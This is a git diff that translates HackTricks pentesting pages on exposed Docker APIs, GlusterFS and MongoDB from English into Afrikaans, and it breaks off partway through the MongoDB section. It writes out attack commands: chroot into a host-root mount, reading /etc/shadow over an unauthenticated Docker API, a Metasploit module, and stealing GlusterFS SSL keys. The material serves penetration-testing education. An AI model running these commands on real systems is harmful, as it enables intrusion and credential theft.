enabling users to run containers without root privileges. +**Podman** is 'n oopbron houer-enjin wat voldoen aan die [Open Container Initiative (OCI) standaarde](https://github.com/opencontainers), ontwikkel en onderhou deur Red Hat. Dit steek uit bo Docker met verskeie onderskeidende kenmerke, veral sy **daemonlose argitektuur** en ondersteuning vir **rootless houers**, wat gebruikers in staat stel om houers sonder root-voorregte uit te voer. -Podman is designed to be compatible with Docker's API, allowing for the use of Docker CLI commands. This compatibility extends to its ecosystem, which includes tools like **Buildah** for building container images and **Skopeo** for image operations such as push, pull, and inspect. More details on these tools can be found on their [GitHub page](https://github.com/containers/buildah/tree/master/docs/containertools). +Podman is ontwerp om versoenbaar te wees met Docker se API, wat die gebruik van Docker CLI-opdragte moontlik maak. Hierdie versoenbaarheid strek tot sy ekosisteem, wat gereedskap soos **Buildah** vir die bou van houerbeelds en **Skopeo** vir beeldoperasies soos stoot, trek en inspekteer insluit. Meer besonderhede oor hierdie gereedskap kan gevind word op hul [GitHub-bladsy](https://github.com/containers/buildah/tree/master/docs/containertools). -**Key Differences** +**Belangrike Verskille** -- **Architecture**: Unlike Docker’s client-server model with a background daemon, Podman operates without a daemon. This design means containers run with the privileges of the user who starts them, enhancing security by eliminating the need for root access. - -- **Systemd Integration**: Podman integrates with **systemd** to manage containers, allowing for container management through systemd units. This contrasts with Docker's use of systemd primarily for managing the Docker daemon process. +- **Argitektuur**: In teenstelling met Docker se klient-bedienermodel met 'n agtergrond-daemon, werk Podman sonder 'n daemon. Hierdie ontwerp beteken dat houers uitgevoer word met die voorregte van die gebruiker wat hulle begin, wat die veiligheid verbeter deur die behoefte aan root-toegang uit te skakel. -- **Rootless Containers**: A pivotal feature of Podman is its ability to run containers under the initiating user's privileges. This approach minimizes the risks associated with container breaches by ensuring that attackers gain only the compromised user's privileges, not root access. +- **Systemd-integrasie**: Podman integreer met **systemd** om houers te bestuur, wat die bestuur van houers deur systemd-eenhede moontlik maak. Dit staan in kontras met Docker se gebruik van systemd hoofsaaklik vir die bestuur van die Docker-daemonproses. -Podman's approach offers a secure and flexible alternative to Docker, emphasizing user privilege management and compatibility with existing Docker workflows. +- **Rootless Houers**: 'n Sleutelkenmerk van Podman is sy vermoë om houers onder die voorregte van die inisieerende gebruiker uit te voer. Hierdie benadering verminder die risiko's wat gepaard gaan met houer-oortredings deur te verseker dat aanvallers slegs die voorregte van die gekompromitteerde gebruiker verkry, nie root-toegang nie. + +Podman se benadering bied 'n veilige en buigsame alternatief vir Docker, met die klem op gebruikersvoorregbestuur en versoenbaarheid met bestaande Docker-werkvloeie. {% hint style="info" %} -Note that as podam aims to support the same API as docker, you can use the same commands with podman as with docker such as: - +Let daarop dat aangesien podman daarop gemik is om dieselfde API as docker te ondersteun, kan jy dieselfde opdragte met podman gebruik as met docker, soos: ```bash podman --version podman info @@ -104,23 +97,20 @@ podman ls ``` {% endhint %} -## Basic Information +## Basiese Inligting -Remote API is running by default on 2375 port when enabled. The service by default will not require authentication allowing an attacker to start a privileged docker container. By using the Remote API one can attach hosts / (root directory) to the container and read/write files of the host’s environment. - -**Default port:** 2375 +Die afstands-API word standaard op poort 2375 uitgevoer as dit geaktiveer is. Die diens vereis standaard nie verifikasie nie, wat 'n aanvaller in staat stel om 'n bevoorregte docker-houer te begin. Deur die gebruik van die afstands-API kan 'n persoon gasheerders / (wortelgids) aan die houer koppel en lêers van die gasheer se omgewing lees/skryf. +**Standaardpoort:** 2375 ``` PORT STATE SERVICE 2375/tcp open docker ``` +## Enumerasie -## Enumeration - -### Manual - -Note that in order to enumerate the docker API you can use the `docker` command or `curl` like in the following example: +### Handleiding +Let daarop dat jy die Docker API kan ondersoek deur die `docker`-opdrag of `curl` te gebruik, soos in die volgende voorbeeld: ```bash #Using curl curl -s http://open.docker.socket:2375/version | jq #Get version @@ -129,50 +119,46 @@ curl -s http://open.docker.socket:2375/version | jq #Get version #Using docker docker -H open.docker.socket:2375 version #Get version Client: Docker Engine - Community - Version: 19.03.1 - API version: 1.40 - Go version: go1.12.5 - Git commit: 74b1e89 - Built: Thu Jul 25 21:21:05 2019 - OS/Arch: linux/amd64 - Experimental: false +Version: 19.03.1 +API version: 1.40 +Go version: go1.12.5 +Git commit: 74b1e89 +Built: Thu Jul 25 21:21:05 2019 +OS/Arch: linux/amd64 +Experimental: false Server: Docker Engine - Community - Engine: - Version: 19.03.1 - API version: 1.40 (minimum version 1.12) - Go version: go1.12.5 - Git commit: 74b1e89 - Built: Thu Jul 25 21:19:41 2019 - OS/Arch: linux/amd64 - Experimental: false - containerd: - Version: 1.2.6 - GitCommit: 894b81a4b802e4eb2a91d1ce216b8817763c29fb - runc: - Version: 1.0.0-rc8 - GitCommit: 425e105d5a03fabd737a126ad93d62a9eeede87f - docker-init: - Version: 0.18.0 - GitCommit: fec3683 +Engine: +Version: 19.03.1 +API version: 1.40 (minimum version 1.12) +Go version: go1.12.5 +Git commit: 74b1e89 +Built: Thu Jul 25 21:19:41 2019 +OS/Arch: linux/amd64 +Experimental: false +containerd: +Version: 1.2.6 +GitCommit: 894b81a4b802e4eb2a91d1ce216b8817763c29fb +runc: +Version: 1.0.0-rc8 +GitCommit: 425e105d5a03fabd737a126ad93d62a9eeede87f +docker-init: +Version: 0.18.0 +GitCommit: fec3683 ``` - -If you can **contact the remote docker API with the `docker` command** you can **execute** any of the **docker** [**commands previously** commented](2375-pentesting-docker.md#basic-commands) to interest with the service. +As jy die afgeleë docker API kan **kontak met die `docker` bevel**, kan jy enige van die **docker** [**bevele wat voorheen** bespreek is](2375-pentesting-docker.md#basic-commands) uitvoer om met die diens te kommunikeer. {% hint style="info" %} -You can `export DOCKER_HOST="tcp://localhost:2375"` and **avoid** using the `-H` parameter with the docker command +Jy kan `export DOCKER_HOST="tcp://localhost:2375"` gebruik en die `-H` parameter met die docker bevel **vermy**. {% endhint %} -#### Fast privilege escalation - +#### Vinnige bevoorregte eskalasie ```bash docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash ``` - #### Curl -Sometimes you’ll see **2376** up for the **TLS** endpoint. I haven’t been able to connect to it with the docker client but it's possible to do it with curl. - +Soms sal jy sien dat **2376** beskikbaar is vir die **TLS** eindpunt. Ek kon nie daarin slaag om daarmee te verbind met die docker-kliënt nie, maar dit is moontlik om dit met curl te doen. ```bash #List containers curl –insecure https://tlsopen.docker.socket:2376/containers/json | jq @@ -202,104 +188,94 @@ curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-ope #Delete stopped containers curl –insecure -vv -X POST -H "Content-Type: application/json" https://tls-opendocker.socket:2376/containers/prune ``` +As jy meer inligting wil hê oor hierdie, is meer inligting beskikbaar waar ek die opdragte gekopieer het: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/) -If you want more information about this, more information is available where I copied the commands from: [https://securityboulevard.com/2019/02/abusing-docker-api-socket/](https://securityboulevard.com/2019/02/abusing-docker-api-socket/) - -### Automatic - +### Outomaties ```bash msf> use exploit/linux/http/docker_daemon_tcp nmap -sV --script "docker-*" -p ``` +## Kompromittering -## Compromising - -In the following page you can find ways to **escape from a docker container**: +In die volgende bladsy kan jy maniere vind om **uit 'n Docker-houer te ontsnap**: {% content-ref url="../linux-hardening/privilege-escalation/docker-security/" %} [docker-security](../linux-hardening/privilege-escalation/docker-security/) {% endcontent-ref %} -Abusing this it's possible to escape form a container, you could run a weak container in the remote machine, escape from it, and compromise the machine: - +Deur hiervan misbruik te maak, is dit moontlik om uit 'n houer te ontsnap. Jy kan 'n swak houer op die afgeleë masjien uitvoer, daaruit ontsnap en die masjien kompromitteer: ```bash docker -H :2375 run --rm -it --privileged --net=host -v /:/mnt alpine cat /mnt/etc/shadow ``` - * [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py) -## Privilege Escalation +## Voorregverhoging -If you are inside a host that is using docker, you may [**read this information to try to elevate privileges**](../linux-hardening/privilege-escalation/#writable-docker-socket). - -## Discovering secrets in running Docker containers +As jy binne 'n gasheer is wat Docker gebruik, kan jy [**hierdie inligting lees om te probeer om voorregte te verhoog**](../linux-hardening/privilege-escalation/#writable-docker-socket). +## Ontdekking van geheime in lopende Docker-houers ```bash docker ps [| grep ] docker inspect ``` +Kyk na **env** (omgewingsveranderlike afdeling) vir geheime en jy mag dalk vind: -Check **env** (environment variable section) for secrets and you may find: - -* Passwords. -* Ip’s. -* Ports. -* Paths. -* Others… . - -If you want to extract a file: +* Wagwoorde. +* IP-adresse. +* Poorte. +* Paaie. +* Ander... . +As jy 'n lêer wil onttrek: ```bash docker cp :/etc/ ``` +## Beveiliging van jou Docker -## Securing your Docker +### Beveiliging van Docker installasie en gebruik -### Securing Docker installation and usage +* Jy kan die instrument [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) gebruik om jou huidige Docker installasie te ondersoek. +* `./docker-bench-security.sh` +* Jy kan die instrument [https://github.com/kost/dockscan](https://github.com/kost/dockscan) gebruik om jou huidige Docker installasie te ondersoek. +* `dockscan -v unix:///var/run/docker.sock` +* Jy kan die instrument [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) gebruik om die voorregte te bepaal wat 'n houer sal hê wanneer dit met verskillende sekuriteitsopsies uitgevoer word. Dit is nuttig om die implikasies van die gebruik van sekuriteitsopsies vir die uitvoer van 'n houer te ken: +* `docker run --rm -it r.j3ss.co/amicontained` +* `docker run --rm -it --pid host r.j3ss.co/amicontained` +* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained` -* You can use the tool [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) to inspect your current docker installation. - * `./docker-bench-security.sh` -* You can use the tool [https://github.com/kost/dockscan](https://github.com/kost/dockscan) to inspect your current docker installation. - * `dockscan -v unix:///var/run/docker.sock` -* You can use the tool [https://github.com/genuinetools/amicontained](https://github.com/genuinetools/amicontained) the privileges a container will have when run with different security options. This is useful to know the implications of using some security options to run a container: - * `docker run --rm -it r.j3ss.co/amicontained` - * `docker run --rm -it --pid host r.j3ss.co/amicontained` - * `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained` +### Beveiliging van Docker Images -### Securing Docker Images +* Jy kan 'n Docker-beeld van [https://github.com/quay/clair](https://github.com/quay/clair) gebruik om jou ander Docker-beelde te skandeer en kwesbaarhede te vind. +* `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"` +* `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image` -* You can use a docker image of [https://github.com/quay/clair](https://github.com/quay/clair) to make it scan your other docker images and find vulnerabilities. - * `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"` - * `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image` +### Beveiliging van Dockerfiles -### Securing Dockerfiles - -* You can use the tool [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) to **inspect your Dockerfile** and find all kinds of misconfigurations. Each misconfiguration will be given an ID, you can find here [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) how to fix each of them. - * `dockerfilelinter -f Dockerfile` +* Jy kan die instrument [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) gebruik om jou Dockerfile te ondersoek en allerlei verkeerde konfigurasies te vind. Elke verkeerde konfigurasie sal 'n ID kry, jy kan hier [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) vind hoe om elkeen van hulle reg te stel. +* `dockerfilelinter -f Dockerfile` ![](<../.gitbook/assets/image (418).png>) -* You can use the tool [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) to **inspect your Dockerfile** and find all kinds of misconfigurations. - * `dockerfilelint Dockerfile` +* Jy kan die instrument [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) gebruik om jou Dockerfile te ondersoek en allerlei verkeerde konfigurasies te vind. +* `dockerfilelint Dockerfile` ![](<../.gitbook/assets/image (419).png>) -* You can use the tool [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) to **inspect your Dockerfile** and find all kinds of misconfigurations. - * `dockerlint Dockerfile` +* Jy kan die instrument [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) gebruik om jou Dockerfile te ondersoek en allerlei verkeerde konfigurasies te vind. +* `dockerlint Dockerfile` ![](<../.gitbook/assets/image (420).png>) -* You can use the tool [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) to **inspect your Dockerfile** and find all kinds of misconfigurations. - * `hadolint Dockerfile` +* Jy kan die instrument [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) gebruik om jou Dockerfile te ondersoek en allerlei verkeerde konfigurasies te vind. +* `hadolint Dockerfile` ![](<../.gitbook/assets/image (421).png>) -### Logging Suspicious activity - -* You can use the tool [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) to detect **suspicious behaviour in running containers**. - * Note in the following chunk how **Falco compiles a kernel module and insert it**. After that, it loads the rules and **start logging suspicious activities**. In this case it has detected 2 privileged containers started, 1 of them with a sensitive mount, and after some seconds it detected how a shell was opened inside one of the containers. +### Log van Verdagte aktiwiteit +* Jy kan die instrument [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) gebruik om **verdagte gedrag in lopende houers** op te spoor. +* Merk op in die volgende blok hoe **Falco 'n kernmodule saamstel en dit invoeg**. Daarna laai dit die reëls en **begin om verdagte aktiwiteite te log**. In hierdie geval het dit 2 bevoorregte houers opgespoor wat begin is, waarvan een 'n sensitiewe koppeling het, en na 'n paar sekondes het dit opgespoor hoe 'n skulp geopen is binne een van die houers. ```bash docker run -it --privileged -v /var/run/docker.sock:/host/var/run/docker.sock -v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro -v /lib/modules:/host/lib/modules:ro -v /usr:/host/usr:ro falco * Setting up /usr/src links from host @@ -318,10 +294,10 @@ DKMS: build completed. falco-probe.ko: Running module version sanity check. modinfo: ERROR: missing module or filename. - - Original module - - No original module exists within this kernel - - Installation - - Installing to /lib/modules/5.0.0-20-generic/kernel/extra/ +- Original module +- No original module exists within this kernel +- Installation +- Installing to /lib/modules/5.0.0-20-generic/kernel/extra/ mkdir: cannot create directory '/lib/modules/5.0.0-20-generic/kernel/extra': Read-only file system cp: cannot create regular file '/lib/modules/5.0.0-20-generic/kernel/extra/falco-probe.ko': No such file or directory @@ -340,25 +316,24 @@ falco-probe found and loaded in dkms 2021-01-04T12:03:24.664354000+0000: Notice Privileged container started (user=root command=container:4443a8daceb8 focused_brahmagupta (id=4443a8daceb8) image=falco:latest) 2021-01-04T12:04:56.270553320+0000: Notice A shell was spawned in a container with an attached terminal (user=root xenodochial_kepler (id=4822e8378c00) shell=bash parent=runc cmdline=bash terminal=34816 container_id=4822e8378c00 image=ubuntu) ``` +### Monitering Docker -### Monitoring Docker +Jy kan auditd gebruik om Docker te monitor. -You can use auditd to monitor docker. - -## References +## Verwysings * [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html) * [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**offisiële PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md index 60a0eaa37..9d6a165ee 100644 --- a/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md +++ b/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md @@ -1,69 +1,61 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Basic Information +# Basiese Inligting -**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified system**. It allows for **arbitrary scalability**, meaning you can easily add or remove storage servers without disrupting the overall file system. This ensures high **availability** and **fault tolerance** for your data. With GlusterFS, you can access your files as if they were stored locally, regardless of the underlying server infrastructure. It provides a powerful and flexible solution for managing large amounts of data across multiple servers. - -**Default ports**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (onwards)\ -For the port 49152, ports incremented by 1 need to be open to use more bricks. _Previously the port 24009 was used instead of 49152._ +**GlusterFS** is 'n **verspreide lêersisteem** wat stoorplek van verskeie bedieners in een **geïntegreerde stelsel** kombineer. Dit maak voorsiening vir **arbitrêre skaalbaarheid**, wat beteken dat jy stoorbedieners maklik kan byvoeg of verwyder sonder om die algehele lêersisteem te ontwrig. Dit verseker hoë **beskikbaarheid** en **fouttoleransie** vir jou data. Met GlusterFS kan jy by jou lêers kom asof hulle plaaslik gestoor word, ongeag die onderliggende bediener-infrastruktuur. Dit bied 'n kragtige en buigsame oplossing vir die bestuur van groot hoeveelhede data oor verskeie bedieners. +**Verstekpoorte**: 24007/tcp/udp, 24008/tcp/udp, 49152/tcp (en verder)\ +Vir die poort 49152 moet poorte wat met 1 verhoog word, oop wees om meer bakstene te gebruik. _Vroeër is die poort 24009 in plaas van 49152 gebruik._ ``` PORT STATE SERVICE 24007/tcp open rpcbind 49152/tcp open ssl/unknown ``` +## Opname -## Enumeration - -To interact with this filesystem you need to install the [**GlusterFS client**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) (`sudo apt-get install glusterfs-cli`). - -To list and mount the available volumes you can use: +Om met hierdie lêersisteem te kommunikeer, moet jy die [**GlusterFS-kliënt**](https://download.gluster.org/pub/gluster/glusterfs/LATEST/) installeer (`sudo apt-get install glusterfs-cli`). +Om die beskikbare volumes te lys en te monteer, kan jy die volgende gebruik: ```bash sudo gluster --remote-host=10.10.11.131 volume list # This will return the name of the volumes sudo mount -t glusterfs 10.10.11.131:/ /mnt/ ``` +As jy 'n **fout kry wanneer jy die lêersisteem probeer monteer**, kan jy die logboeke in `/var/log/glusterfs/` nagaan. -If you receive an **error trying to mount the filesystem**, you can check the logs in `/var/log/glusterfs/` - -**Errors mentioning certificates** can be fixed by stealing the files (if you have access to the system): +**Foute wat sertifikate noem**, kan reggemaak word deur die lêers te steel (as jy toegang tot die stelsel het): * /etc/ssl/glusterfs.ca * /etc/ssl/glusterfs.key * /etc/ssl/glusterfs.ca.pem -And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a different directory is used check for lines similar to: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in the logs) . +En hulle te stoor in jou masjien se `/etc/ssl` of `/usr/lib/ssl` gids (as 'n ander gids gebruik word, kyk vir lyne soos: "_could not load our cert at /usr/lib/ssl/glusterfs.pem_" in die logboeke).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/network-services-pentesting/27017-27018-mongodb.md b/network-services-pentesting/27017-27018-mongodb.md index 9e2325bd6..e6edb0191 100644 --- a/network-services-pentesting/27017-27018-mongodb.md +++ b/network-services-pentesting/27017-27018-mongodb.md @@ -2,47 +2,74 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om te kommunikeer met ervare hackers en foutjagters! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Gaan in gesprek met inhoud wat die opwinding en uitdagings van hacking ondersoek -**Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +**Hack-nuus in werklikheid**\ +Bly op hoogte van die vinnige wêreld van hacking deur middel van werklike nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutjagbountes wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers! -## Basic Information - -**MongoDB** is an **open source** database management system that uses a **document-oriented database model** to handle diverse forms of data. It offers flexibility and scalability for managing unstructured or semi-structured data in applications like big data analytics and content management. -**Default port:** 27017, 27018 +## Basiese Inligting +**MongoDB** is 'n **oopbron** databasisbestuurstelsel wat 'n **dokumentgeoriënteerde databasismodel** gebruik om diverse vorms van data te hanteer. Dit bied buigsaamheid en skaalbaarheid vir die bestuur van ongestruktureerde of semi-gestruktureerde data in toepassings soos groot data-analise en inhoudsbestuur. +**Verstekpoort:** 27017, 27018 ``` PORT STATE SERVICE VERSION 27017/tcp open mongodb MongoDB 2.6.9 2.6.9 ``` +## Opstel -## Enumeration +### Handleiding -### Manual +Om MongoDB-databasisse te enumerasieer, kan jy die volgende stappe volg: +1. Identifiseer die IP-adres en poort van die MongoDB-diens. +2. Maak 'n verbinding met die MongoDB-diens deur die `mongo`-klient te gebruik. +3. Voer die volgende opdrag in om die lys van databasisse te sien: + + ```bash + show dbs + ``` + +4. Voer die volgende opdrag in om die huidige databasis te kies: + + ```bash + use + ``` + +5. Voer die volgende opdrag in om die lys van kolleksies in die databasis te sien: + + ```bash + show collections + ``` + +6. Voer die volgende opdrag in om die dokumente in 'n spesifieke kolleksie te sien: + + ```bash + db..find() + ``` + +Deur hierdie stappe te volg, kan jy die MongoDB-databasisse en hul inhoud ondersoek. ```python from pymongo import MongoClient client = MongoClient(host, port, username=username, password=password) @@ -52,13 +79,115 @@ admin = client.admin admin_info = admin.command("serverStatus") cursor = client.list_databases() for db in cursor: - print(db) - print(client[db["name"]].list_collection_names()) +print(db) +print(client[db["name"]].list_collection_names()) #If admin access, you could dump the database also ``` +**Sommige MongoDB-opdragte:** -**Some MongoDB commnads:** +```bash +# Show databases +# Wys databasisse +show databases +# Use a specific database +# Gebruik 'n spesifieke databasis +use + +# Show collections in the current database +# Wys versamelings in die huidige databasis +show collections + +# Show documents in a collection +# Wys dokumente in 'n versameling +db..find() + +# Insert a document into a collection +# Voeg 'n dokument by 'n versameling in +db..insertOne({}) + +# Update a document in a collection +# Werk 'n dokument in 'n versameling op +db..updateOne({}, {$set: {}}) + +# Delete a document from a collection +# Verwyder 'n dokument uit 'n versameling +db..deleteOne({}) +``` + +**Enumeration:** + +```bash +# Enumerate databases +# Enumereer databasisse +show databases + +# Enumerate collections in a database +# Enumereer versamelings in 'n databasis +show collections + +# Enumerate documents in a collection +# Enumereer dokumente in 'n versameling 